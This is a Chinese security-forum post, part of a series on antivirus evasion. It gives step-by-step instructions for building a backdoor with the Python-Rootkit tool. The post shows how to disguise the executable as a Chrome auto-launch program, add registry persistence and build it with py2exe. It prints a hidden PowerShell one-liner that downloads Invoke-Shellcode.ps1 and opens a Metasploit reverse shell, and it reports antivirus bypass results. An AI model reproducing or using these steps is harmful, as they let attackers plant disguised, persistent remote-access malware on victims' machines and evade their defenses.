安全矩阵

 找回密码
 立即注册
搜索
查看: 2748|回复: 0

远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)

[复制链接]

7

主题

30

帖子

186

积分

注册会员

Rank: 2

积分
186
发表于 2020-3-7 22:47:05 | 显示全部楼层 |阅读模式
本帖最后由 DSH 于 2020-3-7 22:48 编辑

远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)
免杀能力一览表

几点说明:
1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)
4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀或杀软查杀能力的判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。

一、Python-Rootkit介绍
Python-Rootkit,2017年开源的一款工具,当时号称Bypass all anti-virus,主要是对python代码进行多次编码,然后利用py2exe把python代码打包成exe,其实最终执行的是powershell命令,使用了PowerSploit的Invoke-Shellcode.ps1来反弹msf的shell。
程序还添加了后门持续化的功能,大体就是10秒钟检测一次连接是否正常,如果连接不存在就再重连msf,另外还使用了注册表添加了自启动项。
原理很简单,不过我在前期测试中浪费了很长时间。。请往下看
二、安装Python-Rootkit
因为要使用py2exe,所以我就在windows上安装了,如果linux上安装了wine后不知道能不能使用py2exe,可自行测试。
1、先从官网git到本地
·         
  1. git clone <a href="https://github.com/0xIslamTaha/Python-Rootkit" target="_blank">https://github.com/0xIslamTaha/Python-Rootkit</a>
复制代码

2、修改参数
进入Python-Rootkit\viRu5文件夹
打开source.py文件,修改其中的LHOTS和LPORT,这个文件也是后门的主代码

然后删掉或重命名viRu5文件夹中原有的GoogleChromeAutoLaunch.py,把source.py改名为GoogleChromeAutoLaunch.py
3、安装py2exe
然后还需要安装py2exe,我已经下载好了一份python2.7的py2exe安装文件py2exe-0.6.9.win32-py2.7.exe,下载地址https://github.com/TideSec/BypassAntiVirus/blob/master/tools/py2exe-0.6.9.win32-py2.7.exe,下载安装即可。
4、安装metasploit
郑重提示:需要安装需要4.8.2及以下的版本
如果你的msf为4.8.2以上版本,那么后门是反弹不成shell的。期间看到有人说是powershell需要32位的,还有说是需要msf生成shellcode进行配合的,众说纷纭,然后都没解决我的问题。
我就是在这里摸索了好长时间,才发现是msf和PowerSploit的问题,大体是msf升级到5.0后、PowerSploit升级到3.0后有些之前的功能就不大好使了。
所以后来我单独在另一台ubuntu上安装了metasploit 4.8.2,下载安装
·         
  1. wget <a href="https://downloads.metasploit.com/data/releases/archive/metasploit-4.8.2-linux-x64-installer.run" target="_blank">https://downloads.metasploit.com ... x-x64-installer.run</a>chmod +x metasploit-4.8.2-linux-x64-installer.run./metasploit-4.8.2-linux-x64-installer.run
复制代码

一路下一步和y确认就可以

三、Python-Rootkit使用说明
Python-Rootkit使用很简单,只要安装好上面的插件后,执行python.exe setup.py就可以了。
经分析,整个工具的核心代码就一句,下载Invoke-Shellcode.ps1,反弹shell。
·         
  1. <p style="line-height: 30px; text-indent: 2em;">powershell.exe  -noprofile -windowstyle hidden iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <span style="text-indent: 2em;">10.211.55.7 -Lport 3333 -Force;</span></p>
复制代码

如果你没成功反弹shell,如果你安装的msf版本没问题,那么再确认一下你的windows测试机能否连接到https://raw.githubusercontent.com,如果不行的话那肯定执行不成功的。

可以在source.py中把远程服务器换成你自己的服务器地址

本地可以先测试一下,去掉-windowstyle hidden参数,可以看到ps代码执行情况。
·         
  1. powershell.exe  -noprofile  iex (new-object net.webclient).downloadstring('http://10.211.55.2/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.211.55.7 -Lport 3333 -Force;
复制代码

三、利用Python-Rootkit生成后门
在生成后门前,还需要找个.ico图标文件,放在viRu5文件夹中,这样viRu5文件夹里需要有下面几个文件

下面就可以生成后门了
python.exesetup.py
如果前面安装都没问题,就会出现这个界面

提示生成了后门GoogleChromeAutoLaunch.exe

使用msf进行监听windows/meterpreter/reverse_https
为什么是监听windows/meterpreter/reverse_https?因为Invoke-Shellcode.ps1只支持windows/meterpreter/reverse_https和windows/meterpreter/reverse_http的反弹msf的shell。

运行Python-Rootkit\viRu5\dist目录下的GoogleChromeAutoLaunch.exe,可正常上线

打开杀软进行测试,静态检测都可bypass,行为检测时火绒提示隐藏的powershell行为,关闭火绒后可正常上线,360安全卫士和杀毒都没有报警。

virustotal.com上查杀率为7/69,如果有动态检测,估计这个查杀率会非常高。

四、Python-Rootkit小结
Python-Rootkit在测试中因为msf5一直没法上线折腾了很长时间,官方issue居然没有反馈这个问题的,后来调试了半天发现是Invoke-Shellcode.ps1和msf的问题。
免杀效果整体感觉一般,还是python生成exe,执行后调用powershell下载Invoke-Shellcode.ps1,然后反弹shell,应该很容易触发杀软的行为检测。
五、参考


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 01:28 , Processed in 0.017387 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表